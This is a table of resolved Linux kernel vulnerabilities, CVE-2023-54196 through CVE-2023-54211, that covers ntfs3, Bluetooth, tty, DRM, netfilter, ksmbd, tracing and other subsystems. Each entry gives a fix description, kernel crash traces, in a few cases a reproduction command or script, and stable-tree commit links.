| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix NULL pointer dereference in 'ni_write_inode' Syzbot found the following issue: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000016 Mem abort info: ESR = 0x0000000096000006 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x06: level 2 translation fault Data abort info: ISV = 0, ISS = 0x00000006 CM = 0, WnR = 0 user pgtable: 4k pages, 48-bit VAs, pgdp=000000010af56000 [0000000000000016] pgd=08000001090da003, p4d=08000001090da003, pud=08000001090ce003, pmd=0000000000000000 Internal error: Oops: 0000000096000006 [#1] PREEMPT SMP Modules linked in: CPU: 1 PID: 3036 Comm: syz-executor206 Not tainted 6.0.0-rc6-syzkaller-17739-g16c9f284e746 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/26/2022 pstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : is_rec_inuse fs/ntfs3/ntfs.h:313 [inline] pc : ni_write_inode+0xac/0x798 fs/ntfs3/frecord.c:3232 lr : ni_write_inode+0xa0/0x798 fs/ntfs3/frecord.c:3226 sp : ffff8000126c3800 x29: ffff8000126c3860 x28: 0000000000000000 x27: ffff0000c8b02000 x26: ffff0000c7502320 x25: ffff0000c7502288 x24: 0000000000000000 x23: ffff80000cbec91c x22: ffff0000c8b03000 x21: ffff0000c8b02000 x20: 0000000000000001 x19: ffff0000c75024d8 x18: 00000000000000c0 x17: ffff80000dd1b198 x16: ffff80000db59158 x15: ffff0000c4b6b500 x14: 00000000000000b8 x13: 0000000000000000 x12: ffff0000c4b6b500 x11: ff80800008be1b60 x10: 0000000000000000 x9 : ffff0000c4b6b500 x8 : 0000000000000000 x7 : ffff800008be1b50 x6 : 0000000000000000 x5 : 0000000000000000 x4 : 0000000000000001 x3 : 0000000000000000 x2 : 0000000000000008 x1 : 0000000000000001 x0 : 0000000000000000 Call trace: is_rec_inuse fs/ntfs3/ntfs.h:313 [inline] ni_write_inode+0xac/0x798 fs/ntfs3/frecord.c:3232 ntfs_evict_inode+0x54/0x84 fs/ntfs3/inode.c:1744 evict+0xec/0x334 fs/inode.c:665 iput_final fs/inode.c:1748 [inline] iput+0x2c4/0x324 fs/inode.c:1774 ntfs_new_inode+0x7c/0xe0 fs/ntfs3/fsntfs.c:1660 ntfs_create_inode+0x20c/0xe78 fs/ntfs3/inode.c:1278 ntfs_create+0x54/0x74 fs/ntfs3/namei.c:100 lookup_open fs/namei.c:3413 [inline] open_last_lookups fs/namei.c:3481 [inline] path_openat+0x804/0x11c4 fs/namei.c:3688 do_filp_open+0xdc/0x1b8 fs/namei.c:3718 do_sys_openat2+0xb8/0x22c fs/open.c:1311 do_sys_open fs/open.c:1327 [inline] __do_sys_openat fs/open.c:1343 [inline] __se_sys_openat fs/open.c:1338 [inline] __arm64_sys_openat+0xb0/0xe0 fs/open.c:1338 __invoke_syscall arch/arm64/kernel/syscall.c:38 [inline] invoke_syscall arch/arm64/kernel/syscall.c:52 [inline] el0_svc_common+0x138/0x220 arch/arm64/kernel/syscall.c:142 do_el0_svc+0x48/0x164 arch/arm64/kernel/syscall.c:206 el0_svc+0x58/0x150 arch/arm64/kernel/entry-common.c:636 el0t_64_sync_handler+0x84/0xf0 arch/arm64/kernel/entry-common.c:654 el0t_64_sync+0x18c/0x190 Code: 97dafee4 340001b4 f9401328 2a1f03e0 (79402d14) ---[ end trace 0000000000000000 ]--- Above issue may happens as follows: ntfs_new_inode mi_init mi->mrec = kmalloc(sbi->record_size, GFP_NOFS); -->failed to allocate memory if (!mi->mrec) return -ENOMEM; iput iput_final evict ntfs_evict_inode ni_write_inode is_rec_inuse(ni->mi.mrec)-> As 'ni->mi.mrec' is NULL trigger NULL-ptr-deref To solve above issue if new inode failed make inode bad before call 'iput()' in 'ntfs_new_inode()'. | 2025-12-30 | not yet calculated | CVE-2023-54196 | https://git.kernel.org/stable/c/6d3d3283e6b4fb3f3ee05dac30ee1461930b8103 https://git.kernel.org/stable/c/329fc4d3f73d865b25f2ee4eafafb040ace37ad5 https://git.kernel.org/stable/c/1c5cffe0d662fb2de7b63176c2582abb69b5f538 https://git.kernel.org/stable/c/db2a3cc6a3481076da6344cc62a80a4e2525f36f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "Bluetooth: btsdio: fix use after free bug in btsdio_remove due to unfinished work" This reverts commit 1e9ac114c4428fdb7ff4635b45d4f46017e8916f. This patch introduces a possible null-ptr-def problem. Revert it. And the fixed bug by this patch have resolved by commit 73f7b171b7c0 ("Bluetooth: btsdio: fix use after free bug in btsdio_remove due to race condition"). | 2025-12-30 | not yet calculated | CVE-2023-54197 | https://git.kernel.org/stable/c/3b4ed52009723f7dfca7a8ca95163bfb441bfb76 https://git.kernel.org/stable/c/70a104588e3131415e559c06deb834ce259a285a https://git.kernel.org/stable/c/de0ffb5145c9f418ad76f00e58d4b91c680410b2 https://git.kernel.org/stable/c/0837d10f6c37a47a0c73bccf1e39513613a2fcc2 https://git.kernel.org/stable/c/a789192f366147a0fbb395650079906d1d04e0b9 https://git.kernel.org/stable/c/952030c914b5f2288609efe868537afcff7a3f51 https://git.kernel.org/stable/c/8f83fa62614c282dd5d1211a0dd99c6a0a515b81 https://git.kernel.org/stable/c/d8d7ce037d9a8f1f0714ece268c4c2c50845bbc3 https://git.kernel.org/stable/c/db2bf510bd5d57f064d9e1db395ed86a08320c54 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tty: fix out-of-bounds access in tty_driver_lookup_tty() When specifying an invalid console= device like console=tty3270, tty_driver_lookup_tty() returns the tty struct without checking whether index is a valid number. To reproduce: qemu-system-x86_64 -enable-kvm -nographic -serial mon:stdio \ -kernel ../linux-build-x86/arch/x86/boot/bzImage \ -append "console=ttyS0 console=tty3270" This crashes with: [ 0.770599] BUG: kernel NULL pointer dereference, address: 00000000000000ef [ 0.771265] #PF: supervisor read access in kernel mode [ 0.771773] #PF: error_code(0x0000) - not-present page [ 0.772609] Oops: 0000 [#1] PREEMPT SMP PTI [ 0.774878] RIP: 0010:tty_open+0x268/0x6f0 [ 0.784013] chrdev_open+0xbd/0x230 [ 0.784444] ? cdev_device_add+0x80/0x80 [ 0.784920] do_dentry_open+0x1e0/0x410 [ 0.785389] path_openat+0xca9/0x1050 [ 0.785813] do_filp_open+0xaa/0x150 [ 0.786240] file_open_name+0x133/0x1b0 [ 0.786746] filp_open+0x27/0x50 [ 0.787244] console_on_rootfs+0x14/0x4d [ 0.787800] kernel_init_freeable+0x1e4/0x20d [ 0.788383] ? rest_init+0xc0/0xc0 [ 0.788881] kernel_init+0x11/0x120 [ 0.789356] ret_from_fork+0x22/0x30 | 2025-12-30 | not yet calculated | CVE-2023-54198 | https://git.kernel.org/stable/c/3df6f492f500a16c231f07ccc6f6ed1302caddf9 https://git.kernel.org/stable/c/b79109d6470aaae7062998353e3a19449055829d https://git.kernel.org/stable/c/953a4a352a0c185460ae1449e4c6e6658e55fdfc https://git.kernel.org/stable/c/84ea44dc3e4ecb2632586238014bf6722aa5843b https://git.kernel.org/stable/c/f9d9d25ad1f0d060eaf297a2f7f03b5855a45561 https://git.kernel.org/stable/c/765566110eb0da3cf60198b0165ecceeaafa6444 https://git.kernel.org/stable/c/fcfeaa570f7a5c2d5f4f14931909531ff18b7fde https://git.kernel.org/stable/c/db4df8e9d79e7d37732c1a1b560958e8dadfefa1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/adreno: Fix null ptr access in adreno_gpu_cleanup() Fix the below kernel panic due to null pointer access: [ 18.504431] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000048 [ 18.513464] Mem abort info: [ 18.516346] ESR = 0x0000000096000005 [ 18.520204] EC = 0x25: DABT (current EL), IL = 32 bits [ 18.525706] SET = 0, FnV = 0 [ 18.528878] EA = 0, S1PTW = 0 [ 18.532117] FSC = 0x05: level 1 translation fault [ 18.537138] Data abort info: [ 18.540110] ISV = 0, ISS = 0x00000005 [ 18.544060] CM = 0, WnR = 0 [ 18.547109] user pgtable: 4k pages, 39-bit VAs, pgdp=0000000112826000 [ 18.553738] [0000000000000048] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000 [ 18.562690] Internal error: Oops: 0000000096000005 [#1] PREEMPT SMP **Snip** [ 18.696758] Call trace: [ 18.699278] adreno_gpu_cleanup+0x30/0x88 [ 18.703396] a6xx_destroy+0xc0/0x130 [ 18.707066] a6xx_gpu_init+0x308/0x424 [ 18.710921] adreno_bind+0x178/0x288 [ 18.714590] component_bind_all+0xe0/0x214 [ 18.718797] msm_drm_bind+0x1d4/0x614 [ 18.722566] try_to_bring_up_aggregate_device+0x16c/0x1b8 [ 18.728105] __component_add+0xa0/0x158 [ 18.732048] component_add+0x20/0x2c [ 18.735719] adreno_probe+0x40/0xc0 [ 18.739300] platform_probe+0xb4/0xd4 [ 18.743068] really_probe+0xfc/0x284 [ 18.746738] __driver_probe_device+0xc0/0xec [ 18.751129] driver_probe_device+0x48/0x110 [ 18.755421] __device_attach_driver+0xa8/0xd0 [ 18.759900] bus_for_each_drv+0x90/0xdc [ 18.763843] __device_attach+0xfc/0x174 [ 18.767786] device_initial_probe+0x20/0x2c [ 18.772090] bus_probe_device+0x40/0xa0 [ 18.776032] deferred_probe_work_func+0x94/0xd0 [ 18.780686] process_one_work+0x190/0x3d0 [ 18.784805] worker_thread+0x280/0x3d4 [ 18.788659] kthread+0x104/0x1c0 [ 18.791981] ret_from_fork+0x10/0x20 [ 18.795654] Code: f9400408 aa0003f3 aa1f03f4 91142015 (f9402516) [ 18.801913] ---[ end trace 0000000000000000 ]--- [ 18.809039] Kernel panic - not syncing: Oops: Fatal exception Patchwork: https://patchwork.freedesktop.org/patch/515605/ | 2025-12-30 | not yet calculated | CVE-2023-54199 | https://git.kernel.org/stable/c/65a8b6d129cfcf63a2b8a36a63d275479ba6a217 https://git.kernel.org/stable/c/b26bd7791f3cdf3c3318162b1d40c9d1910facca https://git.kernel.org/stable/c/399d01375659c273fb6ad9ccfb6e92bc5b891e0d https://git.kernel.org/stable/c/7af606b9eb11d6cdf767cabbddc326e20d0d4702 https://git.kernel.org/stable/c/5fef23c1c0edceb44d16e64e7818f27d48b5bc38 https://git.kernel.org/stable/c/dbeedbcb268d055d8895aceca427f897e12c2b50 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: always release netdev hooks from notifier This reverts "netfilter: nf_tables: skip netdev events generated on netns removal". The problem is that when a veth device is released, the veth release callback will also queue the peer netns device for removal. Its possible that the peer netns is also slated for removal. In this case, the device memory is already released before the pre_exit hook of the peer netns runs: BUG: KASAN: slab-use-after-free in nf_hook_entry_head+0x1b8/0x1d0 Read of size 8 at addr ffff88812c0124f0 by task kworker/u8:1/45 Workqueue: netns cleanup_net Call Trace: nf_hook_entry_head+0x1b8/0x1d0 __nf_unregister_net_hook+0x76/0x510 nft_netdev_unregister_hooks+0xa0/0x220 __nft_release_hook+0x184/0x490 nf_tables_pre_exit_net+0x12f/0x1b0 .. Order is: 1. First netns is released, veth_dellink() queues peer netns device for removal 2. peer netns is queued for removal 3. peer netns device is released, unreg event is triggered 4. unreg event is ignored because netns is going down 5. pre_exit hook calls nft_netdev_unregister_hooks but device memory might be free'd already. | 2025-12-30 | not yet calculated | CVE-2023-54200 | https://git.kernel.org/stable/c/8d56f00c61f67b450fbbdcb874855e60ad92c560 https://git.kernel.org/stable/c/30e4b13b1bfbdf3bf3b27036d8209ea1b9f0d880 https://git.kernel.org/stable/c/94032527efbac13be702c76afb9d872c0cca7a43 https://git.kernel.org/stable/c/dc1c9fd4a8bbe1e06add9053010b652449bfe411 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/efa: Fix wrong resources deallocation order When trying to destroy QP or CQ, we first decrease the refcount and potentially free memory regions allocated for the object and then request the device to destroy the object. If the device fails, the object isn't fully destroyed so the user/IB core can try to destroy the object again which will lead to underflow when trying to decrease an already zeroed refcount. Deallocate resources in reverse order of allocating them to safely free them. | 2025-12-30 | not yet calculated | CVE-2023-54201 | https://git.kernel.org/stable/c/cf38960386f3cc4abf395e556af915e4babcafd2 https://git.kernel.org/stable/c/e79db2f51a564fd4daa3e508b987df5e81c34b20 https://git.kernel.org/stable/c/24f9884971f9b34915b67baacf7350a3f6f19ea4 https://git.kernel.org/stable/c/dc202c57e9a1423aed528e4b8dc949509cd32191 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/i915: fix race condition UAF in i915_perf_add_config_ioctl Userspace can guess the id value and try to race oa_config object creation with config remove, resulting in a use-after-free if we dereference the object after unlocking the metrics_lock. For that reason, unlocking the metrics_lock must be done after we are done dereferencing the object. [tursulin: Manually added stable tag.] (cherry picked from commit 49f6f6483b652108bcb73accd0204a464b922395) | 2025-12-30 | not yet calculated | CVE-2023-54202 | https://git.kernel.org/stable/c/6eeb1cba4c9dc47656ea328afa34953c28783d8c https://git.kernel.org/stable/c/240b1502708858b5e3f10b6dc5ca3f148a322fef https://git.kernel.org/stable/c/7eb98f5ac551863efe8be810cea1cd5411d677b1 https://git.kernel.org/stable/c/dc30c011469165d57af9adac5baff7d767d20e5c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix slab-out-of-bounds in init_smb2_rsp_hdr When smb1 mount fails, KASAN detect slab-out-of-bounds in init_smb2_rsp_hdr like the following one. For smb1 negotiate(56bytes) , init_smb2_rsp_hdr() for smb2 is called. The issue occurs while handling smb1 negotiate as smb2 server operations. Add smb server operations for smb1 (get_cmd_val, init_rsp_hdr, allocate_rsp_buf, check_user_session) to handle smb1 negotiate so that smb2 server operation does not handle it. [ 411.400423] CIFS: VFS: Use of the less secure dialect vers=1.0 is not recommended unless required for access to very old servers [ 411.400452] CIFS: Attempting to mount \\192.168.45.139\homes [ 411.479312] ksmbd: init_smb2_rsp_hdr : 492 [ 411.479323] ================================================================== [ 411.479327] BUG: KASAN: slab-out-of-bounds in init_smb2_rsp_hdr+0x1e2/0x1f4 [ksmbd] [ 411.479369] Read of size 16 at addr ffff888488ed0734 by task kworker/14:1/199 [ 411.479379] CPU: 14 PID: 199 Comm: kworker/14:1 Tainted: G OE 6.1.21 #3 [ 411.479386] Hardware name: ASUSTeK COMPUTER INC. Z10PA-D8 Series/Z10PA-D8 Series, BIOS 3801 08/23/2019 [ 411.479390] Workqueue: ksmbd-io handle_ksmbd_work [ksmbd] [ 411.479425] Call Trace: [ 411.479428] <TASK> [ 411.479432] dump_stack_lvl+0x49/0x63 [ 411.479444] print_report+0x171/0x4a8 [ 411.479452] ? kasan_complete_mode_report_info+0x3c/0x200 [ 411.479463] ? init_smb2_rsp_hdr+0x1e2/0x1f4 [ksmbd] [ 411.479497] kasan_report+0xb4/0x130 [ 411.479503] ? init_smb2_rsp_hdr+0x1e2/0x1f4 [ksmbd] [ 411.479537] kasan_check_range+0x149/0x1e0 [ 411.479543] memcpy+0x24/0x70 [ 411.479550] init_smb2_rsp_hdr+0x1e2/0x1f4 [ksmbd] [ 411.479585] handle_ksmbd_work+0x109/0x760 [ksmbd] [ 411.479616] ? _raw_spin_unlock_irqrestore+0x50/0x50 [ 411.479624] ? smb3_encrypt_resp+0x340/0x340 [ksmbd] [ 411.479656] process_one_work+0x49c/0x790 [ 411.479667] worker_thread+0x2b1/0x6e0 [ 411.479674] ? process_one_work+0x790/0x790 [ 411.479680] kthread+0x177/0x1b0 [ 411.479686] ? kthread_complete_and_exit+0x30/0x30 [ 411.479692] ret_from_fork+0x22/0x30 [ 411.479702] </TASK> | 2025-12-30 | not yet calculated | CVE-2023-54203 | https://git.kernel.org/stable/c/921536046bd165efeb07beef5630aff35cd6a489 https://git.kernel.org/stable/c/a8334a0c535d0f0b4d64926c8fe0922ed98f7d43 https://git.kernel.org/stable/c/99a51c673b1d2d0b5a972353401b77612d9cc713 https://git.kernel.org/stable/c/dc8289f912387c3bcfbc5d2db29c8947fa207c11 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: sunplus: fix return value check of mmc_add_host() mmc_add_host() may return error, if we ignore its return value, 1. the memory allocated in mmc_alloc_host() will be leaked 2. null-ptr-deref will happen when calling mmc_remove_host() in remove function spmmc_drv_remove() because deleting not added device. Fix this by checking the return value of mmc_add_host(). Moreover, I fixed the error handling path of spmmc_drv_probe() to clean up. | 2025-12-30 | not yet calculated | CVE-2023-54204 | https://git.kernel.org/stable/c/741a951f41929f39cae70c66d86d0754d3129d0a https://git.kernel.org/stable/c/dce6d8f985fa1ef5c2af47f4f86ea65511b78656 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: stm32: Fix refcount leak in stm32_pctrl_get_irq_domain of_irq_find_parent() returns a node pointer with refcount incremented, We should use of_node_put() on it when not needed anymore. Add missing of_node_put() to avoid refcount leak. | 2025-12-30 | not yet calculated | CVE-2023-54205 | https://git.kernel.org/stable/c/95ab6d7905ebb52dc2ed6357c38e536753824068 https://git.kernel.org/stable/c/8ab860dd8717a7e4a143988885fea0d7e5a9412e https://git.kernel.org/stable/c/af54707c0ccab52b3d532402436ea101011a9299 https://git.kernel.org/stable/c/601be03fa8b81747a154bdef9b559411a5b921e8 https://git.kernel.org/stable/c/9ae053d1eb87875d56f95b6a123a69827225a70e https://git.kernel.org/stable/c/dcef18c8ac40aa85bb339f64c1dd31dd458b06fb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: flower: fix filter idr initialization The cited commit moved idr initialization too early in fl_change() which allows concurrent users to access the filter that is still being initialized and is in inconsistent state, which, in turn, can cause NULL pointer dereference [0]. Since there is no obvious way to fix the ordering without reverting the whole cited commit, alternative approach taken to first insert NULL pointer into idr in order to allocate the handle but still cause fl_get() to return NULL and prevent concurrent users from seeing the filter while providing miss-to-action infrastructure with valid handle id early in fl_change(). [ 152.434728] general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN [ 152.436163] KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] [ 152.437269] CPU: 4 PID: 3877 Comm: tc Not tainted 6.3.0-rc4+ #5 [ 152.438110] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 [ 152.439644] RIP: 0010:fl_dump_key+0x8b/0x1d10 [cls_flower] [ 152.440461] Code: 01 f2 02 f2 c7 40 08 04 f2 04 f2 c7 40 0c 04 f3 f3 f3 65 48 8b 04 25 28 00 00 00 48 89 84 24 00 01 00 00 48 89 c8 48 c1 e8 03 <0f> b6 04 10 84 c0 74 08 3c 03 0f 8e 98 19 00 00 8b 13 85 d2 74 57 [ 152.442885] RSP: 0018:ffff88817a28f158 EFLAGS: 00010246 [ 152.443851] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000 [ 152.444826] RDX: dffffc0000000000 RSI: ffffffff8500ae80 RDI: ffff88810a987900 [ 152.445791] RBP: ffff888179d88240 R08: ffff888179d8845c R09: ffff888179d88240 [ 152.446780] R10: ffffed102f451e48 R11: 00000000fffffff2 R12: ffff88810a987900 [ 152.447741] R13: ffffffff8500ae80 R14: ffff88810a987900 R15: ffff888149b3c738 [ 152.448756] FS: 00007f5eb2a34800(0000) GS:ffff88881ec00000(0000) knlGS:0000000000000000 [ 152.449888] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 152.450685] CR2: 000000000046ad19 CR3: 000000010b0bd006 CR4: 0000000000370ea0 [ 152.451641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 152.452628] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 152.453588] Call Trace: [ 152.454032] <TASK> [ 152.454447] ? netlink_sendmsg+0x7a1/0xcb0 [ 152.455109] ? sock_sendmsg+0xc5/0x190 [ 152.455689] ? ____sys_sendmsg+0x535/0x6b0 [ 152.456320] ? ___sys_sendmsg+0xeb/0x170 [ 152.456916] ? do_syscall_64+0x3d/0x90 [ 152.457529] ? entry_SYSCALL_64_after_hwframe+0x46/0xb0 [ 152.458321] ? ___sys_sendmsg+0xeb/0x170 [ 152.458958] ? __sys_sendmsg+0xb5/0x140 [ 152.459564] ? do_syscall_64+0x3d/0x90 [ 152.460122] ? entry_SYSCALL_64_after_hwframe+0x46/0xb0 [ 152.460852] ? fl_dump_key_options.part.0+0xea0/0xea0 [cls_flower] [ 152.461710] ? _raw_spin_lock+0x7a/0xd0 [ 152.462299] ? _raw_read_lock_irq+0x30/0x30 [ 152.462924] ? nla_put+0x15e/0x1c0 [ 152.463480] fl_dump+0x228/0x650 [cls_flower] [ 152.464112] ? fl_tmplt_dump+0x210/0x210 [cls_flower] [ 152.464854] ? __kmem_cache_alloc_node+0x1a7/0x330 [ 152.465592] ? nla_put+0x15e/0x1c0 [ 152.466160] tcf_fill_node+0x515/0x9a0 [ 152.466766] ? tc_setup_offload_action+0xf0/0xf0 [ 152.467463] ? __alloc_skb+0x13c/0x2a0 [ 152.468067] ? __build_skb_around+0x330/0x330 [ 152.468814] ? fl_get+0x107/0x1a0 [cls_flower] [ 152.469503] tc_del_tfilter+0x718/0x1330 [ 152.470115] ? is_bpf_text_address+0xa/0x20 [ 152.470765] ? tc_ctl_chain+0xee0/0xee0 [ 152.471335] ? __kernel_text_address+0xe/0x30 [ 152.471948] ? unwind_get_return_address+0x56/0xa0 [ 152.472639] ? __thaw_task+0x150/0x150 [ 152.473218] ? arch_stack_walk+0x98/0xf0 [ 152.473839] ? __stack_depot_save+0x35/0x4c0 [ 152.474501] ? stack_trace_save+0x91/0xc0 [ 152.475119] ? security_capable+0x51/0x90 [ 152.475741] rtnetlink_rcv_msg+0x2c1/0x9d0 [ 152.476387] ? rtnl_calcit.isra.0+0x2b0/0x2b0 [ 152.477042] ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54206 | https://git.kernel.org/stable/c/253a3a324e0ebc2825de76a0f5f17b8383b2023d https://git.kernel.org/stable/c/dd4f6bbfa646f258e5bcdfac57a5c413d687f588 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: uclogic: Correct devm device reference for hidinput input_dev name Reference the HID device rather than the input device for the devm allocation of the input_dev name. Referencing the input_dev would lead to a use-after-free when the input_dev was unregistered and subsequently fires a uevent that depends on the name. At the point of firing the uevent, the name would be freed by devres management. Use devm_kasprintf to simplify the logic for allocating memory and formatting the input_dev name string. | 2025-12-30 | not yet calculated | CVE-2023-54207 | https://git.kernel.org/stable/c/f283805d984343b2f216e2f4c6c7af265b9542ae https://git.kernel.org/stable/c/4c2707dfee5847dc0b5ecfbe512c29c93832fdc4 https://git.kernel.org/stable/c/58f0d1c0e494a88f301bf455da7df4366f179bbb https://git.kernel.org/stable/c/dd613a4e45f8d35f49a63a2064e5308fa5619e29 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: ov5675: Fix memleak in ov5675_init_controls() There is a kmemleak when testing the media/i2c/ov5675.c with bpf mock device: AssertionError: unreferenced object 0xffff888107362160 (size 16): comm "python3", pid 277, jiffies 4294832798 (age 20.722s) hex dump (first 16 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<00000000abe7d67c>] __kmalloc_node+0x44/0x1b0 [<000000008a725aac>] kvmalloc_node+0x34/0x180 [<000000009a53cd11>] v4l2_ctrl_handler_init_class+0x11d/0x180 [videodev] [<0000000055b46db0>] ov5675_probe+0x38b/0x897 [ov5675] [<00000000153d886c>] i2c_device_probe+0x28d/0x680 [<000000004afb7e8f>] really_probe+0x17c/0x3f0 [<00000000ff2f18e4>] __driver_probe_device+0xe3/0x170 [<000000000a001029>] driver_probe_device+0x49/0x120 [<00000000e39743c7>] __device_attach_driver+0xf7/0x150 [<00000000d32fd070>] bus_for_each_drv+0x114/0x180 [<000000009083ac41>] __device_attach+0x1e5/0x2d0 [<0000000015b4a830>] bus_probe_device+0x126/0x140 [<000000007813deaf>] device_add+0x810/0x1130 [<000000007becb867>] i2c_new_client_device+0x386/0x540 [<000000007f9cf4b4>] of_i2c_register_device+0xf1/0x110 [<00000000ebfdd032>] of_i2c_notify+0xfc/0x1f0 ov5675_init_controls() won't clean all the allocated resources in fail path, which may causes the memleaks. Add v4l2_ctrl_handler_free() to prevent memleak. | 2025-12-30 | not yet calculated | CVE-2023-54208 | https://git.kernel.org/stable/c/086a80b842bcb621d6c4eedad20683f1f674d0c2 https://git.kernel.org/stable/c/bcae9115a163198dce9126aa8bedc1c007ec30ed https://git.kernel.org/stable/c/ba54908ae8225d58f1830edb394d4153bcb7d0aa https://git.kernel.org/stable/c/49b849824b9862f177fc77fc92ef95ec54566ecf https://git.kernel.org/stable/c/7a36a6be694df87d019663863b922913947b42af https://git.kernel.org/stable/c/dd74ed6c213003533e3abf4c204374ef01d86978 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block: fix blktrace debugfs entries leakage Commit 99d055b4fd4b ("block: remove per-disk debugfs files in blk_unregister_queue") moves blk_trace_shutdown() from blk_release_queue() to blk_unregister_queue(), this is safe if blktrace is created through sysfs, however, there is a regression in corner case. blktrace can still be enabled after del_gendisk() through ioctl if the disk is opened before del_gendisk(), and if blktrace is not shutdown through ioctl before closing the disk, debugfs entries will be leaked. Fix this problem by shutdown blktrace in disk_release(), this is safe because blk_trace_remove() is reentrant. | 2025-12-30 | not yet calculated | CVE-2023-54209 | https://git.kernel.org/stable/c/aa07e56c6a9c7558165690d14eed4fe8babf34fb https://git.kernel.org/stable/c/7149e57cf01184fba175589f8fbe9fbf33be02e1 https://git.kernel.org/stable/c/942e81650b81b4ca62f1d8c61de455c9e7c7e6ca https://git.kernel.org/stable/c/dd7de3704af9989b780693d51eaea49a665bd9c2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_sync: Avoid use-after-free in dbg for hci_remove_adv_monitor() KASAN reports that there's a use-after-free in hci_remove_adv_monitor(). Trawling through the disassembly, you can see that the complaint is from the access in bt_dev_dbg() under the HCI_ADV_MONITOR_EXT_MSFT case. The problem case happens because msft_remove_monitor() can end up freeing the monitor structure. Specifically: hci_remove_adv_monitor() -> msft_remove_monitor() -> msft_remove_monitor_sync() -> msft_le_cancel_monitor_advertisement_cb() -> hci_free_adv_monitor() Let's fix the problem by just stashing the relevant data when it's still valid. | 2025-12-30 | not yet calculated | CVE-2023-54210 | https://git.kernel.org/stable/c/0d4d6b083da9b033ddccef72d77f373c819ae3ea https://git.kernel.org/stable/c/bf00c2c8f6254f44ac041aa9a311ae9e0caf692b https://git.kernel.org/stable/c/de6dfcefd107667ce2dbedf4d9337f5ed557a4a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tracing: Fix warning in trace_buffered_event_disable() Warning happened in trace_buffered_event_disable() at WARN_ON_ONCE(!trace_buffered_event_ref) Call Trace: ? __warn+0xa5/0x1b0 ? trace_buffered_event_disable+0x189/0x1b0 __ftrace_event_enable_disable+0x19e/0x3e0 free_probe_data+0x3b/0xa0 unregister_ftrace_function_probe_func+0x6b8/0x800 event_enable_func+0x2f0/0x3d0 ftrace_process_regex.isra.0+0x12d/0x1b0 ftrace_filter_write+0xe6/0x140 vfs_write+0x1c9/0x6f0 [...] The cause of the warning is in __ftrace_event_enable_disable(), trace_buffered_event_enable() was called once while trace_buffered_event_disable() was called twice. Reproduction script show as below, for analysis, see the comments: ``` #!/bin/bash cd /sys/kernel/tracing/ # 1. Register a 'disable_event' command, then: # 1) SOFT_DISABLED_BIT was set; # 2) trace_buffered_event_enable() was called first time; echo 'cmdline_proc_show:disable_event:initcall:initcall_finish' > \ set_ftrace_filter # 2. Enable the event registered, then: # 1) SOFT_DISABLED_BIT was cleared; # 2) trace_buffered_event_disable() was called first time; echo 1 > events/initcall/initcall_finish/enable # 3. Try to call into cmdline_proc_show(), then SOFT_DISABLED_BIT was # set again!!! cat /proc/cmdline # 4. Unregister the 'disable_event' command, then: # 1) SOFT_DISABLED_BIT was cleared again; # 2) trace_buffered_event_disable() was called second time!!! echo '!cmdline_proc_show:disable_event:initcall:initcall_finish' > \ set_ftrace_filter ``` To fix it, IIUC, we can change to call trace_buffered_event_enable() at fist time soft-mode enabled, and call trace_buffered_event_disable() at last time soft-mode disabled. | 2025-12-30 | not yet calculated | CVE-2023-54211 | https://git.kernel.org/stable/c/1488d782c9e43087a3f341b8186cd25f3cf75583 https://git.kernel.org/stable/c/b4f4ab423107dc1ba8e9cc6488c645be6403d3f5 https://git.kernel.org/stable/c/cdcc35e6454133feb61561b4e0d0c80e52cbc2ba https://git.kernel.org/stable/c/a6d2fd1703cdc8ecfc3e73987e0fb7474ae2b074 https://git.kernel.org/stable/c/813cede7b2f5a4b1b75d2d4bb4e705cc8e063b20 https://git.kernel.org/stable/c/a3a3c7bddab9b6c5690b20796ef5e332b8c48afb https://git.kernel.org/stable/c/528c9d73153754defb748f0b96ad33308668d817 https://git.kernel.org/stable/c/dea499781a1150d285c62b26659f62fb00824fce |
